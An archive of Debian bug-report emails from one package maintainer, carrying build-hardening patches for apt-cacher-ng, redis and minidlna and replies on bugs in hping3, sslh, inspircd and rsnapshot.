+++ tree-1.7.0/debian/rules	2014-09-07 15:23:01.0 +0200
@@ -17,10 +17,14 @@
 CFLAGS += -Wall -DLINUX -D_LARGEFILE64_SOURCE -D_FILE_OFFSET_BITS=64
 
 override_dh_auto_build:
-	$(MAKE) CFLAGS=$(CFLAGS) LDFLAGS=$(LDFLAGS)
+	$(MAKE) CFLAGS=$(CFLAGS) LDFLAGS=$(LDFLAGS) CPPFLAGS=$(CPPFLAGS)
 
 override_dh_auto_install:
 	$(MAKE) install prefix=$(prefix) MANDIR=$(MANDIR)
 
+override_dh_clean:
+	dh_clean
+	rm -f tree
+
 %:
 	dh $@

Bug#760699: Hardened build flags not fully enabled

2014-09-07 Thread Guillaume Delacour 
Le dimanche 07 septembre 2014 à 03:40 +0200, Guillaume Delacour a
écrit :
 Package: apt-cacher-ng
 Version: 0.7.27-1
 Severity: important
 Tags: patch
 User: hardening-disc...@lists.alioth.debian.org
 Usertags: goal-hardening
 
 Hello,
 
 Please find attached a patch that enable all hardening flags in your
 package.
 
 Although apt-cacher-ng use dh/9, CPPFLAGS (fortify) was not enabled.
 Besides since debhelper 0.9.20120417 handle the workaround appending
 CPPFLAGS to CXXFLAGS, i still had to do (i've not investigated though).
 I've also enabled the optionals pie and bindnow.

debhelper must handle the situation
(/usr/share/perl5/Debian/Debhelper/Buildsystem/cmake.pm, sub configure)
and enable verbose compiler command lines, there is a problem somewhere
(due to package or in debhelper itself). As it concerns some other
packages, i'll take a look and report back.

 
 After the build i've made some tests (apt-get update  apt-get install
 $package through apt-cacher-ng) which confirm that it won't break
 anything (at least at first glance).
 
 Finally, i've made the build verbose to let blhc see if all flags are
 enabled in the future.
 
 

-- 
Guillaume Delacour g...@iroqwa.org



signature.asc
Description: This is a digitally signed message part

Bug#760699: Hardened build flags not fully enabled

2014-09-07 Thread Guillaume Delacour 
Le dimanche 07 septembre 2014 à 21:35 +0200, Eduard Bloch a écrit :
 Hallo,
 * Guillaume Delacour [Sun, Sep 07 2014, 08:54:13PM]:
  Le dimanche 07 septembre 2014 à 03:40 +0200, Guillaume Delacour a
  écrit :
   Package: apt-cacher-ng
   Version: 0.7.27-1
   Severity: important
   Tags: patch
   User: hardening-disc...@lists.alioth.debian.org
   Usertags: goal-hardening
   
   Hello,
   
   Please find attached a patch that enable all hardening flags in your
   package.
   
   Although apt-cacher-ng use dh/9, CPPFLAGS (fortify) was not enabled.
   Besides since debhelper 0.9.20120417 handle the workaround appending
   CPPFLAGS to CXXFLAGS, i still had to do (i've not investigated though).
   I've also enabled the optionals pie and bindnow.
  
  debhelper must handle the situation
  (/usr/share/perl5/Debian/Debhelper/Buildsystem/cmake.pm, sub configure)
  and enable verbose compiler command lines, there is a problem somewhere
  (due to package or in debhelper itself). As it concerns some other
  packages, i'll take a look and report back.
 
 Uhm... I have a wrapper GNUMakefile there for convenience, which builds
 the source out-of-source-tree and also extends CXXFLAGS as needed. Maybe
 that's the reason why tweaking CMake internal variables is not really
 effective.
 
 And I guess that this method is not uncommon since CMake tends to be
 very messy and the best way to get reproducible builds actually to make
 OOST builds and wipe the directory on cleaning.

This is exactly the reason why debhelper does not consider a real
cmake build system because of the presence of GNUmakefile.

To have a verbose build instead of dh_auto_build -- VERBOSE=1:

export CMAKEOPTS+=-DCMAKE_VERBOSE_MAKEFILE=ON

Do the job but when the fortify flag disappear (!).

For CPPFLAGS (which is ignored by CMake itself) i tried different
methods such as:

include /usr/share/dpkg/buildflags.mk
CFLAGS+=$(CPPFLAGS)
CXXFLAGS+=$(CPPFLAGS)

Another one:
export CMAKEOPTS+=-DCMAKE_VERBOSE_MAKEFILE=ON 
-DCMAKE_C_FLAGS_RELWITHDEBINFO:STRING=$(CXXFLAGS) -D_FORTIFY_SOURCE=2


With no success.


Anyway, the first patch works (but maybe need some documentation about
the special usecase) but feel free to do different, the goal is to
enable all build flags dynamically through dpkg-buildflags to handle
future compiler options and have a verbose build (mean full compiler
command lines) to check presence of flags in buildd logs.

You can use hardening-wrapper (from hardening-includes package) to test
the generated binary against flags:

$ hardening-check build/apt-cacher-ng 
build/apt-cacher-ng:
 Position Independent Executable: yes
 Stack protected: yes
 Fortify Source functions: yes (some protected functions found)
 Read-only relocations: yes
 Immediate binding: yes

 
 Regards,
 Eduard.
 

-- 
Guillaume Delacour g...@iroqwa.org


signature.asc
Description: This is a digitally signed message part

Bug#760792: Enable verbose build

2014-09-07 Thread Guillaume Delacour 
Package: minidlna
Version: 1.1.2+dfsg-1.1+b1
Severity: minor
Tags: patch

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Hi,

configure is call directly from override_dh_auto_configure in
debian/rules, which overwrites all other options (such as
- --disable-silent-rules) passed via debhelper.

Unless there is a good reason to do that, please consider pass overriden
options instead, this let the possibilyt to enable verbose build to
detect compiler build flags on buildd.

-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCAAGBQJUDMqdAAoJEJmGUYuaqqClGbMP+gLt9PTik0DgCienNpImiA/k
HzP7Drh3H6Z6oKz2MdI+5ZdV3LPAVaxZ88e42t/spfzkt4l1uG6BNw7hfah44a5Y
H7nVcea7X1ryW40v8WQPpOgDNGcHBGgy54iPBFMqC5zNSjZ16ensysMEJKAdKkiv
WrPtNuR3TY/5vMGB+pIRFFDkASUjKnsbcry0hkOkPbZ/CwlJ4CCbWHCFfNacrz2j
Znv3q+GKXYZs7ycWn+H0w0tMPV4r4deAXtULzxEJcT/DQZjGChLhMWZpsmgNMBvD
vK5bo9IZBQpEWFwODwobyab3VCsybCg/fvOZRT9fbKxSCvwkeNbku2siQ2jCXxqk
NIWidEKfC9sGXdYnIIFdYEic9qat5tPfpDZ6rSW02FBlA/klLAkLY0k4Vacuc0lR
80sjkGHtXzBjN2pqpHBpSTvmc04JqltW1DEpkJ4ThmRCajQacV/Yn1GRj8K4QdSQ
UGh24yUEe1JOjMVcVYjUEokZJWXiC82oYGUvTsP5ZvQNEg82PNNjPnoNmBxtsar8
Czb1mEd7mjWeumJdNdY6KI2GtiPkhQwbjggqB/lKK+dkhh4ZJlEpa77IGUYn3wCs
shW/iHbmnMUx+CT2CnxG/6w7+L44wBruihdXZDvsE/dLVJMK7XLUaOafAFoEjfR/
zRmSd0YKt08su9G4VWDl
=87Rp
-END PGP SIGNATURE-
diff -Nru minidlna-1.1.2+dfsg/debian/changelog minidlna-1.1.2+dfsg/debian/changelog
--- minidlna-1.1.2+dfsg/debian/changelog	2014-06-16 12:01:30.0 +0200
+++ minidlna-1.1.2+dfsg/debian/changelog	2014-09-07 23:02:03.0 +0200
@@ -1,3 +1,12 @@
+minidlna (1.1.2+dfsg-1.2) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Don't call ./configure directly but pass overriden options to
+dh_auto_configure instead; this make possible to enable verbose build on
+buildd
+
+ -- Guillaume Delacour g...@iroqwa.org  Sun, 07 Sep 2014 22:49:35 +0200
+
 minidlna (1.1.2+dfsg-1.1) unstable; urgency=medium
 
   * Non-maintainer upload.
diff -Nru minidlna-1.1.2+dfsg/debian/rules minidlna-1.1.2+dfsg/debian/rules
--- minidlna-1.1.2+dfsg/debian/rules	2014-04-28 22:33:25.0 +0200
+++ minidlna-1.1.2+dfsg/debian/rules	2014-09-07 23:02:15.0 +0200
@@ -9,7 +9,7 @@
 	dh $@ --with autoreconf
 
 override_dh_auto_configure:
-	./configure --prefix=$(PREFIX) --sbindir=$(PREFIX)/bin
+	dh_auto_configure -- --prefix=$(PREFIX) --sbindir=$(PREFIX)/bin
 
 override_dh_installchangelogs:
 	dh_installchangelogs NEWS

Bug#760699: Hardened build flags not fully enabled

2014-09-06 Thread Guillaume Delacour 
Package: apt-cacher-ng
Version: 0.7.27-1
Severity: important
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Hello,

Please find attached a patch that enable all hardening flags in your
package.

Although apt-cacher-ng use dh/9, CPPFLAGS (fortify) was not enabled.
Besides since debhelper 0.9.20120417 handle the workaround appending
CPPFLAGS to CXXFLAGS, i still had to do (i've not investigated though).
I've also enabled the optionals pie and bindnow.

After the build i've made some tests (apt-get update  apt-get install
$package through apt-cacher-ng) which confirm that it won't break
anything (at least at first glance).

Finally, i've made the build verbose to let blhc see if all flags are
enabled in the future.


-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCAAGBQJUC7d3AAoJEJmGUYuaqqClvoQP/i9rbzn23sH9w9T4Xo9R4BnO
KbkIth35qiy13mj+X2ryS4L7arrCGZkCmGDM/Cd//CY5DiuoSrsXQvE8yfWHOd1n
EZ9TIt5ksJkrrfFLcHyJefwqCwD+k/hEQ6s0h3qUml8BTQPvnOGw0ZiquuT0j8Mj
Zn0HnIxxbpI8qcElQsQVRPK2EBmPMd/BGxTJPjlCITVxfTt8StZqPr+8zv+ScWx7
IpKwLsZWIFeFQsI1UUSVlYo9fjUgc+LJTvFLMfowYRGfVmptsxuyFgzEW6bvBvV9
NurWIDVtGisZLLQVati0P3/grJmWLk3gqGBvTBk56cBLtO7QzKULQ9ZbkO99cHh8
4yjjil2ziXrGU85wTjSjWPkkyx1CtbTm7eyE/10SiSKjhp5M7TbWyjIuAjOlrysB
9uJQ9iIrxyoYDoyorTwju80jo4dlmPCBLdbuDnl6nQC+vPS/GTXVj9H7m7n1KHdB
TvDa1GqvJaJevYT+Nvm4kc4n1FIpWry64Dgd8wroV16zUFU04MFfdO6oIEX9q8f0
8jn0+OOs42pZXFVp7SycR/qLd7o6/HDIqNi/6LQCwOqWGk1HK0bq3gqHKLwY099U
bXY1Lem/pkyp+WrFhhIsQpvGtgMpkiYgTs4PPqUdDJaCTsffP93YHgpaoKZJ00/l
Ouj5qQrm72NJjl0Y+K3E
=ylIF
-END PGP SIGNATURE-
diff -Nru apt-cacher-ng-0.7.27/debian/rules apt-cacher-ng-0.7.27/debian/rules
--- apt-cacher-ng-0.7.27/debian/rules	2014-07-17 21:35:38.0 +0200
+++ apt-cacher-ng-0.7.27/debian/rules	2014-09-07 02:55:35.0 +0200
@@ -3,9 +3,16 @@
 TGT=$(CURDIR)/debian/apt-cacher-ng
 CDIR=$(TGT)/etc/apt-cacher-ng
 
+export DEB_BUILD_MAINT_OPTIONS = hardening=+all
+# cmake doesn't follow CPPFLAGS, see #653916
+CXXFLAGS+=$(CPPFLAGS)
+
 %:
 	dh $@ --parallel --with systemd
 
+override_dh_auto_build:
+	dh_auto_build -- VERBOSE=1
+
 override_dh_install:
 	dh_install $(test -e build/acngfs || echo -Xacngfs)
 	cp systemd/apt-cacher-ng.service debian

Bug#760567: Use dpkg-buildflags

2014-09-05 Thread Guillaume Delacour 
Source: redis
Version: 2.8.13
Severity: normal
Tags: patch

Hi,

Please find attached a proposal that use dpkg-buildflags (and hardening
flags) and enable multiple make jobs in your package.

Please note that *FLAGS are defined and exported manually in debian/rules since
the package use debhelper 7 (these 4 lines can be removed if debhelper 9 used).

-- System Information:
Debian Release: jessie/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.2.0-67-generic (SMP w/4 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/dash
diff -Nru redis-2.8.13/debian/changelog redis-2.8.13/debian/changelog
--- redis-2.8.13/debian/changelog	2014-08-05 18:16:56.0 +0200
+++ redis-2.8.13/debian/changelog	2014-09-05 14:31:00.0 +0200
@@ -1,3 +1,12 @@
+redis (2:2.8.13-3.1) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Use dpkg-buildflags CFLAGS, CPPFLAGS (patch upstream Makefile) and
+LDFLAGS, also use pie and relro via DEB_BUILD_MAINT_OPTIONS
+  * Call make V=1 to show gcc command lines (blhc) and enable parallel build
+
+ -- Guillaume Delacour g...@iroqwa.org  Fri, 05 Sep 2014 09:49:19 +0200
+
 redis (2:2.8.13-3) unstable; urgency=low
 
   * Correct permissions of our /var directories by chowning them recursively.
diff -Nru redis-2.8.13/debian/patches/04-dpkg-buildflags.diff redis-2.8.13/debian/patches/04-dpkg-buildflags.diff
--- redis-2.8.13/debian/patches/04-dpkg-buildflags.diff	1970-01-01 01:00:00.0 +0100
+++ redis-2.8.13/debian/patches/04-dpkg-buildflags.diff	2014-09-05 12:16:02.0 +0200
@@ -0,0 +1,43 @@
+Author: Guillaume Delacour g...@iroqwa.org
+Subject: Add CPPFLAGS in upstream makefiles
+Last-Update: 2014-09-05
+
+Index: redis-2.8.13/src/Makefile
+===
+--- redis-2.8.13.orig/src/Makefile
 redis-2.8.13/src/Makefile
+@@ -87,7 +87,7 @@ ifeq ($(MALLOC),jemalloc)
+ 	FINAL_LIBS+= -ljemalloc
+ endif
+ 
+-REDIS_CC=$(QUIET_CC)$(CC) $(FINAL_CFLAGS)
++REDIS_CC=$(QUIET_CC)$(CC) $(FINAL_CFLAGS) $(CPPFLAGS)
+ REDIS_LD=$(QUIET_LINK)$(CC) $(FINAL_LDFLAGS)
+ REDIS_INSTALL=$(QUIET_INSTALL)$(INSTALL)
+ 
+Index: redis-2.8.13/deps/linenoise/Makefile
+===
+--- redis-2.8.13.orig/deps/linenoise/Makefile
 redis-2.8.13/deps/linenoise/Makefile
+@@ -6,7 +6,7 @@ R_CFLAGS= $(STD) $(WARN) $(OPT) $(DEBUG)
+ R_LDFLAGS= $(LDFLAGS)
+ DEBUG= -g
+ 
+-R_CC=$(CC) $(R_CFLAGS)
++R_CC=$(CC) $(R_CFLAGS) $(CPPFLAGS)
+ R_LD=$(CC) $(R_LDFLAGS)
+ 
+ linenoise.o: linenoise.h linenoise.c
+Index: redis-2.8.13/deps/hiredis/Makefile
+===
+--- redis-2.8.13.orig/deps/hiredis/Makefile
 redis-2.8.13/deps/hiredis/Makefile
+@@ -28,7 +28,7 @@ CC:=$(shell sh -c 'type $(CC) /dev/null
+ OPTIMIZATION?=-O3
+ WARNINGS=-Wall -W -Wstrict-prototypes -Wwrite-strings
+ DEBUG?= -g -ggdb
+-REAL_CFLAGS=$(OPTIMIZATION) -fPIC $(CFLAGS) $(WARNINGS) $(DEBUG) $(ARCH)
++REAL_CFLAGS=$(OPTIMIZATION) -fPIC $(CFLAGS) $(WARNINGS) $(DEBUG) $(ARCH) $(CPPFLAGS)
+ REAL_LDFLAGS=$(LDFLAGS) $(ARCH)
+ 
+ DYLIBSUFFIX=so
diff -Nru redis-2.8.13/debian/patches/series redis-2.8.13/debian/patches/series
--- redis-2.8.13/debian/patches/series	2014-08-05 18:16:56.0 +0200
+++ redis-2.8.13/debian/patches/series	2014-09-05 14:04:24.0 +0200
@@ -1,3 +1,4 @@
 01-fix-ftbfs-on-kfreebsd.diff -p1
 02-fix-ftbfs-on-kfreebsd -p1
 03-use-system-jemalloc.diff -p1
+04-dpkg-buildflags.diff -p1
diff -Nru redis-2.8.13/debian/rules redis-2.8.13/debian/rules
--- redis-2.8.13/debian/rules	2014-08-05 18:16:56.0 +0200
+++ redis-2.8.13/debian/rules	2014-09-05 14:18:15.0 +0200
@@ -1,6 +1,17 @@
 #!/usr/bin/make -f
 
-unexport CFLAGS
+export DEB_BUILD_MAINT_OPTIONS = hardening=+all
+
+CPPFLAGS:=$(shell dpkg-buildflags --get CPPFLAGS)
+CFLAGS:=$(shell dpkg-buildflags --get CFLAGS)
+LDFLAGS:=$(shell dpkg-buildflags --get LDFLAGS)
+export CPPFLAGS CFLAGS LDFLAGS
+
+ifneq (,$(filter parallel=%,$(DEB_BUILD_OPTIONS)))
+	NUMJOBS = $(patsubst parallel=%,%,$(filter parallel=%,$(DEB_BUILD_OPTIONS)))
+	MAKEFLAGS += -j$(NUMJOBS)
+	export MAKEFLAGS
+endif
 
 ifneq (,$(filter $(shell dpkg-architecture -qDEB_HOST_ARCH),armel hurd-i386 kfreebsd-amd64 kfreebsd-i386 s390 sparc))
 export FORCE_LIBC_MALLOC = yes
@@ -14,6 +25,9 @@
 
 override_dh_auto_install:
 
+override_dh_auto_build:
+	dh_auto_build --parallel -- V=1
+
 clean:
 	dh $@
 	rm -f src/release.h

Bug#711075: hping3: Option '-z'/increasing TTL for traceroute mode doesn't work

2014-09-04 Thread Guillaume Delacour 
Le mardi 04 juin 2013 à 14:55 +0200, christian mock a écrit :
 Package: hping3
 Version: 3.a2.ds2-6
 Severity: normal
 
 Dear Maintainer,

First, sorry for the late.

 
 In the current version of hping3, there seems to be no way to use
 Ctrl-Z to increase the TTL in the traceroute mode (-T). Neither with
 nor without the -z option does this work.
 
 In earlier versions, hping3 intercepted Ctrl-Z, now it just
 backgrounds due to shell job control.

Please note that the version 3.a2.ds2-6 was unchanged between Debian 6
and 7.

Anyway, i don't reproduce this; every time i press Ctrl-z, the ttl is
increased (Gnome terminal 3.4.1.1). If i use --unbind, the Ctrl-z is
ignored by hping3, so the process goes in background.

Can you re-test the feature and maybe with another environnement ?

 
 -- System Information:
 Debian Release: 7.0
   APT prefers stable-updates
   APT policy: (500, 'stable-updates'), (500, 'stable')
 Architecture: amd64 (x86_64)
 Foreign Architectures: i386
 
 Kernel: Linux 3.2.0-4-amd64 (SMP w/8 CPU cores)
 Locale: LANG=C, LC_CTYPE=de_AT.UTF-8 (charmap=UTF-8)
 Shell: /bin/sh linked to /bin/bash
 
 Versions of packages hping3 depends on:
 ii  libc6   2.13-38
 ii  libpcap0.8  1.3.0-1
 ii  tcl8.4  8.4.19-5
 
 hping3 recommends no packages.
 
 hping3 suggests no packages.
 
 -- no debconf information

-- 
Guillaume Delacour g...@iroqwa.org


signature.asc
Description: This is a digitally signed message part

Bug#688458: Conflicting types for variable ip_optlen

2014-09-04 Thread Guillaume Delacour 
Le samedi 22 septembre 2012 à 22:07 +0100, Michael Tautschnig a écrit :
 Package: hping3
 Version: 3.a2.ds2-6
 
 While compiling the package using our research compiler infrastructure we
 noticed the following conflicting declaration of the variable ip_optlen:
 
 - globals.h: extern char ip_optlen;
 - main.c: unsigned ip_optlen;

 This will cause undefined behaviour if the value of ip_optlen exceeds 127 for
 any architecture with signed char type. This is also problematic in other 
 cases
 where ip_optlen stores the return value of functions returning unsigned char.

Good catch. I understand the possible collision, but i don't measure
well the real impact in the source code.

Hping3 author is not active anymore on this project and i can only
maintain the packaging or minor modifications, so unless there is a
blocker issue, i'll not investigate the problem further (but another
patch for hping3 could be integrated in Debian if someone want to take
the time).

Thanks.

 
 Best,
 Michael
 

-- 
Guillaume Delacour g...@iroqwa.org


signature.asc
Description: This is a digitally signed message part

Bug#735922: wishlist: document logging in /var/log/auth.log

2014-07-14 Thread Guillaume Delacour 
Le samedi 18 janvier 2014 à 17:28 +0100, Geert Stappers a écrit :
 Package: sslh
 Version: 1.13b-3.2
 Severity: minor
 
 Dear Maintainer,
 
 
 When I have logged in through sslh, my connection is from localhost. I
 do understand this artifact of sslh. I did took me some time to find
 out from where the connection came from.
 
 It would be nice if the manual page says that logging
 is done in /var/log/auth.log

Yes you're right, sslh use LOG_AUTH facility (in common.c:488) which is
on Debian systems logged in /var/log/auth.log (in /etc/rsyslog.conf:61).

I'll propose upstream to add a syslog paragraph in the manpage to
document this.

 
 
 Thank you for maintaining sslh in Debian.
 
 
 Cheers
 Geert Stappers
 
 
 -- System Information:
 Debian Release: 7.0
   APT prefers stable-updates
   APT policy: (500, 'stable-updates'), (500, 'stable')
 Architecture: amd64 (x86_64)
 
 Kernel: Linux 3.2.0-4-amd64 (SMP w/4 CPU cores)
 Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1)
 Shell: /bin/sh linked to /bin/dash
 
 Versions of packages sslh depends on:
 ii  adduser   3.113+nmu3
 ii  debconf   1.5.49
 ii  libc6 2.13-38
 ii  libconfig91.4.8-5
 ii  lsb-base  4.1+Debian8
 ii  update-inetd  4.43
 
 Versions of packages sslh recommends:
 ii  apache2  2.2.22-13
 ii  apache2-mpm-prefork [httpd]  2.2.22-13
 ii  openssh-server [ssh-server]  1:6.0p1-4
 
 Versions of packages sslh suggests:
 pn  openbsd-inetd | inet-superserver  none
 
 -- Configuration Files:
 /etc/default/sslh changed:
 RUN=yes
 DAEMON=/usr/sbin/sslh
 DAEMON_OPTS=--user sslh --listen 0.0.0.0:443 --numeric --ssh 127.0.0.1:22 
 --ssl 127.0.0.1:443 --pidfile /var/run/sslh/sslh.pid
 
 
 -- debconf information:
 * sslh/inetd_or_standalone: standalone
 

-- 
Guillaume Delacour g...@iroqwa.org


signature.asc
Description: This is a digitally signed message part

Bug#740560: sslh fails to start with systemd as PID=1

2014-07-14 Thread Guillaume Delacour 
Le dimanche 02 mars 2014 à 22:35 +0100, Gilles Filippini a écrit :
 Package: sslh
 Version: 1.15-1
 Severity: normal
 
 Hi,

Hi,

 
 I've just switched to systemd as init system on my box, and after rebbot
 sslh wasn't running. From what I understand the cause of the failure is
 a missing /var/run/sslh directory.
 
 After adding the settings below to the sslh.service file, I can start it
 manually using invoke-rc.d but it keeps failing at boot time:
 ExecStartPre=/bin/mkdir -p /var/run/sslh
 ExecStartPre=/bin/chown -R sslh:sslh /var/run/sslh/

Instead, i can propose to use a /usr/lib/tmpfiles.d/sslh.conf file like
this:

d /run/sslh 0755 sslh sslh -

I'll test this soon, but maybe you'll test this before me.

 
 Please let me know about any missing information in this report.
 
 Thanks,
 
 _g.

-- 
Guillaume Delacour g...@iroqwa.org


signature.asc
Description: This is a digitally signed message part

Bug#669177: inspircd: unversioned dependency on package hurd on hurd-i386

2014-07-13 Thread Guillaume Delacour 
Le vendredi 27 avril 2012 à 09:32 +0100, Jonathan Wiltshire a écrit :
 Hi!
 
 On 2012-04-26 19:33, Guillaume Delacour wrote:
  Le mercredi 18 avril 2012 à 00:01 +0100, Jonathan Wiltshire a écrit :
  E: inspircd: depends-on-essential-package-without-using-version 
  depends: hurd
 
  As inspircd use libpthread, it seems to be a bug and will be fixed 
  with
  the next upload of eglibc that include libpthread (as #debian-hurd
  folks).
 
 Ok. In that case please clone+retitle+reassign this bug to hurd and set 
 appropriate Blocks so that it is documented somewhere.

I'm sorry, i didn't manage to find the origin of this bug, closing it
now.

 
 Thanks
 
 
 

-- 
Guillaume Delacour g...@iroqwa.org


signature.asc
Description: This is a digitally signed message part

Bug#668253: inspircd: does not close stdin or stderr on startup, consumes 100% cpu

2014-07-13 Thread Guillaume Delacour 
Le mercredi 13 juin 2012 à 20:24 +0930, Michael a écrit :
 Hello,
 
 This bug is marked as fixed-upstream, however the bug has not been
 fixed in Debian stable.
 
 For me, the 100% CPU issue occurs with inspircd
 1.1.22+dfsg-4+squeeze1, but not inspircd 1.1.22+dfsg-4, on two
 different systems.  To me this indicates a bug in the security update.
 
 Can this fix please be backported into stable?  It makes the software
 unusable otherwise, and I have to hold off on applying the security
 update or upgrade to testing.

Instead of backporting the fix, the new version 2.0.5 (which fix many
issues) has been backported the 29 Mar 2013 into stable (which is
Squeeze oldstable today).

Sorry for the late answer.

 
 Thanks,
 
 
 Michael
 
 
 

-- 
Guillaume Delacour g...@iroqwa.org


signature.asc
Description: This is a digitally signed message part

Bug#724874: [PKG-IRC-Maintainers] Bug#724874: inspircd: 2.0.15 now available

2014-06-16 Thread Guillaume Delacour 
Hi,

Le lundi 16 juin 2014 à 14:45 +, Jeremy Stanley a écrit :
 On 2014-06-16 15:29:20 +0800 (+0800), David Adam wrote:
  I removed my package so that Guillaume could upload his, but I
  think that took his 2.0.16 package away too - sorry. Guillame does
  have a 2.0.16 package available.
 
 It would be great to get that moving again... there are a lot of bug
 fixes between the 2.0.5 currently in Sid/Jessie and 2.0.16, so would
 be disappointing to see Jessie release with those issues. If the
 2.0.16 source package is somewhere accessible or if Guillaume could
 put it back up on mentors.d.n, I'd be happy to review and test it
 (though not being a DD I can't sponsor of course).

I re-uploaded it again on mentors, thanks for feedback !

-- 
Guillaume Delacour g...@iroqwa.org


signature.asc
Description: This is a digitally signed message part

Bug#724874: [PKG-IRC-Maintainers] Bug#724874: Bug#724874: inspircd: 2.0.15 now available

2014-03-02 Thread Guillaume Delacour 
Hi all,

Le samedi 01 mars 2014 à 15:14 +0100, Christoph Biedl a écrit :
 Christoph Biedl wrote...
 
  Now I'd like to suggest the following procedure: Unless nobody objects
  by Thu March 6th, feel free to upload your inspircd packaging.
 

I've prepared a package a few days ago by didn't finish it, there is the
changelog:

  * New upstream release (Closes: #724874), enable m_regex_stdlib new
module
  * Drop patches accepted upstream:
+ debian/patches/01_spelling_error.diff
+ debian/patches/03_CVE-2012-1836.diff (cherry-picked)
+ debian/patches/04_FTBFS_kfreebsd.diff
+ debian/patches/05_FTBFS_gcc-4.7.diff
  * debian/docs: docs/README has moved to README.md
  * debian/examples: examples are now in docs/conf
  * Bump debhelper compat to 9
  * Remove Bradley Smith as uploaders (Closes: #674890)
  * debian/watch: update based on sepwatch
  * Add systemd support:
+ Build-Depends on dh-systemd (= 1.5)
+ Add debian/inspircd.service,
debian/inspircd.tmpfiles.d.conf 

   
+ debian/rules: call generic dh with --with systemd
  * debian/control: Change Vcs-{Svn,Browser}, point to
anonscm.debian.org and
bump to Standards-Version 3.9.5 (no changes needed)
  * debian/patches/02_disable_rpath_for_extra_modules.diff: Refresh
according
upstream modules changes

 -- Guillaume Delacour g...@iroqwa.org  Sat, 01 Feb 2014 15:36:52 +0100


I've started to rewrite debian/copyright too, i can just finish it.

I propose to integrate David's diff to my version and add it to
uploaders today or within the next week.

 ___
 Pkg-irc-maintainers mailing list
 pkg-irc-maintain...@lists.alioth.debian.org
 http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/pkg-irc-maintainers

-- 
Guillaume Delacour g...@iroqwa.org


signature.asc
Description: This is a digitally signed message part

Bug#717451: Backups broken when ssh_args are set

2013-07-28 Thread Guillaume Delacour 
Le jeudi 25 juillet 2013 à 18:12 -0400, Michel L. a écrit :
 Package: rsnapshot
 Version: 1.3.1-4
 Followup-For: Bug #717451
 
 Dear Maintainer,
 
 Just want to confirm that rsnapshot is failing here as well. When using
 ssh_args, for example:
 
 ssh_args-o BatchMode=yes -p 1234
 
 
 I downgraded to rsnapshot 1.3.1-3[0], to get my backups working again. 
 
 [0] http://snapshot.debian.org/package/rsnapshot/1.3.1-3/#rsnapshot_1.3.1-3 
 
 

You're both right, the ssh args are broken since i've applied the patch
10_space_destdir.diff [0].

The last upstream version is also impacted by this changes [1]. The
solution proposed is the same as the first reporter of this bug and
upstream is now thinking about a way to properly handle rsync --rsh=
arguments.

As rsnapshot remote backup with ssh is now broken, i'll include the
proposed workaround as a countermeasure (at least temporarily).

[0]:
http://rsnapshot.cvs.sourceforge.net/viewvc/rsnapshot/rsnapshot/rsnapshot-program.pl?revision=1.414view=markup
[1]: https://github.com/DrHyde/rsnapshot/pull/1

-- 
Guillaume Delacour g...@iroqwa.org


signature.asc
Description: This is a digitally signed message part

Bug#717940: Incorrect description of rsync_numtries in rsnapshot.conf

2013-07-28 Thread Guillaume Delacour 
Le samedi 27 juillet 2013 à 00:59 +0200, Jonathan Leroy a écrit :
 Package: rsnapshot
 Version: 1.3.1-1
 Severity: minor
 Tags: upstream
 
 Hi,

Hi,

 
 The description of rsync_numtries setting in rsnapshot.conf seems to
 be incorrect:
 
 # Number of rsync re-tries. If you experience any network problems or
 # network card issues that tend to cause ssh to crap-out with
 # Corrupted MAC on input errors, for example, set this to a non-zero
 # value to have the rsync operation re-tried
 #
 #rsync_numtries 0

The configuration says set this to a non-zero value, what do you
suggest to be more precise ? (i never use this option, but think it'
quite clear like this). I agree that the default commented value should
be 1 instead of 0.

-- 
Guillaume Delacour g...@iroqwa.org


signature.asc
Description: This is a digitally signed message part

Bug#710283: inspircd: Starting Inspircd fails on writing to PID file

2013-06-02 Thread Guillaume Delacour 
Le mercredi 29 mai 2013 à 16:45 +0200, Tim Gouma a écrit :
 Package: inspircd
 Version: 2.0.5-1+b1
 Severity: grave
 Tags: upstream
 Justification: renders package unusable

Hi,

 
 After configuration Inspircd always fails to start with the following error 
 in /var/log/inspircd.log
 Wed May 29 16:33:24 2013: Failed to write PID-file 'data/inspircd.pid', 
 exiting. But in the config file the pid file location is configured as 
 /var/run/inspircd.pid
 
 -- System Information:
 Debian Release: 7.0
   APT prefers stable
   APT policy: (500, 'stable')
 Architecture: i386 (x86_64)
 
 Kernel: Linux 3.2.0-4-amd64 (SMP w/1 CPU core)
 Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
 Shell: /bin/sh linked to /bin/dash
 
 Versions of packages inspircd depends on:
 ii  libc6 2.13-38
 ii  libgcc1   1:4.7.2-5
 ii  libgeoip1 1.4.8+dfsg-3
 ii  libgnutls26   2.12.20-6
 ii  libldap-2.4-2 2.4.31-1+nmu2
 ii  libmysqlclient18  5.5.31+dfsg-0+wheezy1
 ii  libpcre3  1:8.30-5
 ii  libpq59.2.4-1.pgdg70+1
 ii  libsqlite3-0  3.7.13-1+deb7u1
 ii  libstdc++64.7.2-5
 ii  libtre5   0.8.0-3
 ii  lsb-base  4.1+Debian8
 ii  zlib1g1:1.2.7.dfsg-13
 
 inspircd recommends no packages.
 
 Versions of packages inspircd suggests:
 pn  gnutls-binnone
 pn  ldap-server   none
 pn  mysql-server  none
 pn  postgresqlnone
 pn  sqlite3   none
 
 -- Configuration Files:
 /etc/default/inspircd changed:
 INSPIRCD_ENABLED=1
 
 /etc/inspircd/inspircd.conf changed:
 pid file=/var/run/inspircd.pid /
Problem with /^

You've edited your configuration and add a slash before , this is why
inspircd fails to start (reproduced with wheezy chroot). The correct
(package default) directive might be :

   pid file=/var/run/inspircd.pid


 - Cut Irrelevant Parts of Config file -
 
 -- no debconf information
 

-- 
Guillaume Delacour g...@iroqwa.org


signature.asc
